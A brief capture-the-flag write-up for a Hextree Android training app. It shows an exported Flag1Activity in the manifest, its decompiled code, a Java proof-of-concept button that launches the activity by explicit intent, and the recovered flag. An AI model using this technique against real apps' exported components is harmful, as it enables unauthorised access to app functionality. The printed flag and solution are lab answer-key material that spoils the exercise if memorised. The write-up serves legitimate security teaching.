Static Analysis
Upon inspecting the Flag1Activity in the AndroidManifset.xml file we see the following
<activity
android:name="io.hextree.attacksurface.activities.Flag1Activity"
android:exported="true"/>Since exported is set to true we can call this activity from our exploit apk, let’s review the code to see how can we get the flag
public class Flag1Activity extends AppCompactActivity {
public Flag1Activity() {
this.name = "Flag 1 - Basic exported activity";
this.flag = "zABitOReWutKdkrMKx2NPVXklOmLz1SB85u2kJjUe1ojI9LMWkbEKkjANz15WHmb";
}
@Override
protected void onCreate(Bundle bundle) {
super.onCreate(bundle);
this.f = new LogHelper(this);
this.f.addTag("basic-main-activity-avd2");
success(this);
}
}So we only need to call this acitivity and we will get the flag
Creating POC
In our apk we create a button that when click it fire an intent to Flag1Activity
Button button = findViewById(R.id.button_flag1);
button.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
Log.v("HEXTREE", "Going to flag 1 activity");
Intent intent = new Intent();
intent.setComponent(
new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag1Activity"));
startActivity(intent);
}
});Flag
HXT{basic-exported-activity-1bh7sd}